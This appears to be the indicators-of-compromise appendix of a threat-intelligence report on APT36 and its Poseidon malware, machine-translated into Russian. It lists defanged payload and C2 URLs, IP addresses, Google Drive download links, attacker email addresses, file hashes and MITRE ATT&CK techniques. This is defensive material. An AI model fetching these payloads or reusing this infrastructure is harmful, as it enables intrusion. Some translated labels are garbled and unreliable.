| hxxps://dipl[.]site/Content/2022-23/01/01/ | |
| hxxps://dipl[.]site/Content/2022-23/01/01/ugt254d.hta | |
| hxxps://dipl[.]site/Content/2022-23/01/02/US_China_standoff-Opportunity-for-India-Chadha-21-Aug-23.zip | |
| hxxps://slidesfinder[.]com/free-templates/freefiles/158/08978.png | |
| hxxps://slidesfinder[.]com/free-templates/freefiles/158/Letter002.pdf | |
| hxxps://slidesfinder[.]com/free-templates/freefiles/158/rt12.png | |
| hxxps://slidesfinder[.]com/free-templates/freefiles/158/rtloki.png | |
| hxxps://slidesfinder[.]com/free-templates/freefiles/158/tmps.dotm | |
| hxxps://mazagondoc[.]com/documents01/001doc.pdf | |
| hxxps://mazagondoc[.]com/documents01/08978.png | |
| hxxps://mazagondoc[.]com/documents01/Filezilla.exe | |
| hxxps://mazagondoc[.]com/documents01/Letter002.pdf | |
| hxxps://mazagondoc[.]com/documents01/rt12.png | |
| hxxps://mazagondoc[.]com/documents01/sigthief.py | |
| hxxps://mazagondoc[.]com/images/AdobeArm.exe | |
| hxxps://mazagondoc[.]com/images/AdobeReader.bat | |
| hxxps://mazagondoc[.]com/images/Chromes.exe | |
| hxxps://mazagondoc[.]com/images/awccs.bat | |
| hxxps://mazagondoc[.]com/images/igfxtk.bat | |
| hxxps://mazagondoc[.]com/images/igfxtk.exe | |
| hxxps://mazagondoc[.]com/images/msedg.bat | |
| hxxps://mazagondoc[.]com/images/msedg.exe | |
| hxxps://mazagondoc[.]com/images/msedgprefix.exe | |
| hxxps://mazagondoc[.]com/images/sigthief.py | |
| hxxps://mazagondoc[.]com/images/pdf/Naval_Projects_Payment_section_Report_29092023.docx | |
| hxxps://mazagondoc[.]com/images/pdf/cheexe.exe | |
| hxxps://mazagondoc[.]com/images/templates/Aerospace.dotm | |
| hxxps://mazagondoc[.]com/images/templates/Naval_Projects_Payment_section_Report_131023.docx | |
| hxxps://mazagondoc[.]com/images/templates/Slide7.png | |
| hxxps://mazagondoc[.]com/images/templates/logo.png | |
| hxxps://mazagondoc[.]com/images/templates/propritery/doc-logo.png | |
| hxxps://mazagondoc[.]com/images/word/Naval_Projects_Payment_section_Report_131023.docx | |
| hxxps://mazagondoc[.]com/images/word/Project_and_Services_Section_report_10102023.docx | |
| Хозяин | |
| C:\Windows\Tasks\useH.hta | |
| C:\Windows\Tasks\useT.hta | |
| C:\Windows\Tasks\alphaT.hta | |
| C:\Windows\Tasks\appH.bat | |
| C:\Windows\Tasks\appT.bat | |
| C:\Windows\Tasks\user01.bat | |
| C:\Windows\Tasks\user02.bat | |
| C:\ProgramData\VSUpdates\svirbre.exe | |
| C:\Users\пользователь\AppData\Roaming\AdobeArm.exe | |
| C:\Users\пользователь\AppData\Local\PrintsLogs\Postgres.exe | |
| C:\Users\Public\BroadCastHUB\DUser.dll | |
APT36
| f264ed8c76b1102ea55d73d931ab879b | survey1.zip |
| 6065407484f1e22e814dfa00bd1fae06 | PCBL_05_25_ИЮНЬ_2024_Консолидация IP-адресов.pdf.desktop |
| bdde8c9948142fafeec00d7094ae964f | LTC_checklist.desktop |
| bd9de1f98e8797926ab0fc9f2c6ca888 | Перевод в соответствии с фазой III ротационного перевода.рабочий стол |
| 8b5bf198e4948d4fe6a4b0402f7246e5 | IAFT-1715.zip |
| 2bf596603c432fa46b494dc3edd2d30f | GTK-Theme-Parse.txt |
| 3a65fbc14bd7ff12cda97282935eefd8 | Форма опроса об использовании Интернета_protected.pdf (приманка) |
| ELF | |
| 4eaa6a69c9835c29ce8d39734e5d3d5f | Пароль (загрузчик Golang) |
| 4c52bb770d7b8639e1f305f908dbc800 | vmcoreinfo.txt (DISGOMOJI) |
| Посейдон | |
| c5ef19c97462e791f21c32931975dc7b | distro-dlna |
| b2d407d569e4b21ff12736dbc434577f | cjs-bin |
| 12aef7e734fb872f9160a1c2a47326d5 | bin-xdg |
| 7d6373d9f9a4270bd8af53f3861d7a9c | acpid-dit |
| IP-адреса | |
| 165.22.221[.]71 178.128.166[.]148 152.42.162[.]105 161.35.207[.]209 159.65.146[.]80 157.245.100[.]177 |
Посейдон |
| URL-адреса | |
| hxxps://campusportals[.]in/myfiles/bdocuments/survey1.zip | |
| 165.22.221[.]71/distro-dlna | |
| 178.128.166[.]148/cjs-bin | |
| 159.65.146[.]80/bin-xdg | |
| 157.245.100[.]177/acpid-dit | |
| hxxps://drive.google[.]com/file/d/1p9rewZLjJ3WUdmj_As6el9G5IPNtkEUN/view?usp=sharing | |
| hxxps://drive.google[.]com/file/d/1cAPvjfakAWIHVa_cZXw_iwLDqsIi1uRX/view?usp=sharing | |
| hxxps://drive.google[.]com/file/d/1cIxWwVrhS4L6EHiDKc8Ua86NtciC4Njx/view?usp=sharing | |
| hxxps://drive.google[.]com/uc?export=download&id=1dlI8jSabaeJT1MnQxiih0Ww-hZrG-GAe | |
| hxxps://drive.google[.]com/uc?export=download&id=1XvW8ir8l0G9axv4lhEvQFOxOyzmMV64t | |
| hxxps://drive.google[.]com/uc?export=download&id=1btUsB3nWehTNW8Cho9Wv3Efrt4c6EhI_ | |
| fikumatry@gmail[.]com | |
| fitfalcon0900@gmail[.]com | |
MITRE ATT & CK
| тактика | Идентификатор техники | Имя |
| Развитие ресурсов | T1583.001 T1584.001 T1587.001 T1588.001 T1588.002 T1608.001 T1608.005 |
Приобретение инфраструктуры: домены Инфраструктура компрометации: домены Возможности развития: вредоносное ПО Получить возможности: вредоносное ПО Получить возможности: инструмент Возможности этапа: загрузка вредоносного ПО Возможности этапа: Ссылка на цель |
| Первоначальный доступ | T1566.001 T1566.002 |
Фишинг: фишинговое вложение Фишинг: Ссылка на фишинг |
| Типы | T1106 T1129 T1059 T1047 T1204.001 T1204.002 |
Родной API Общие модули Интерпретатор команд и сценариев Инструментарий управления Windows Казнь пользователя: вредоносная ссылка Пользовательское выполнение: вредоносный файл |
| Настойчивость | T1053.003 T1547.001 T1547.013 |
Запланированная задача/задание: Cron Ключи запуска реестра / Папка автозагрузки Выполнение автозапуска загрузки или входа в систему: записи автозапуска XDG |
| Уклонение от защиты | T1027.010 T1036.005 T1036.007 T1140 T1218.005 T1574.002 T1027.009 T1027.010 |
Запутывание команд Маскарадинг: Соответствие законному имени или местоположению Маскарад: двойное расширение файла Деобфускация/декодирование файлов или информации Выполнение системного двоичного прокси: Mshta Поток выполнения Hijack: боковая загрузка DLL Замаскированные файлы или информация: встроенные полезные нагрузки Замаскированные файлы или информация: запутывание команд |
| Дискавери | T1012 T1016 T1033 T1057 T1082 T1083 T1518.001 |
Реестр запросов Обнаружение конфигурации сети системы Обнаружение владельца системы/пользователя Обнаружение процесса Обнаружение системной информации Обнаружение файлов и каталогов Обнаружение программного обеспечения: обнаружение программного обеспечения безопасности |
| | T1005 T1056.001 T1074.001 T1119 T1113 T1125 |
Данные из локальной системы Захват ввода: кейлоггинг Постановка данных: постановка локальных данных Автоматизированный сбор Захват экрана Video Capture |
| Управление и контроль | T1105 T1571 T1573 T1071.001 |
Входной инструмент передачи Нестандартный порт Зашифрованный канал Протокол прикладного уровня: веб-протоколы |
| эксфильтрации | T1020 T1041 T1567 |
Автоматическая эксфильтрация Эксфильтрация через канал C2 Эксфильтрация через веб-сервис |
Автор: Sathwik Ram Prakki



